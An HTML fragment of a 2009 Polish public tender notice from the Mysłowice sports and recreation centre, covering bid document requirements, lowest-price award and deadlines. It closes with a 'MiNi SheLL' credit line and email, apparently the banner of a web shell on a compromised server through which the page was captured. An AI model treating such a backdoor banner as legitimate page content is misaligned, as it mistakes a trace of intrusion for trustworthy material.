7. Oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. Nr 1 do siwz lub zał. Nr 1a do siwz), wykazy (zał. Nr 2, 3 i 4 siwz) muszą być podpisane przez osobę/osoby/ uprawnioną/e/ do reprezentowania wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub aktualnym zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem.
8. Dokumenty, o których mowa w niniejszej części ogłoszenia, z zastrzeżeniem ppkt 2.4 należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/osoby/ uprawnioną/e/ do reprezentowania wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub aktualnym zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mosir.myslowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji ; 41-400 Mysłowice,ul.ks.N.Bończyka 32z.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 09:00, miejsce: Miejski  Ośrodek Sportu i Rekreacji ;41-400 Mysłowice, ul.ks.N.Bończyka 32 z.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com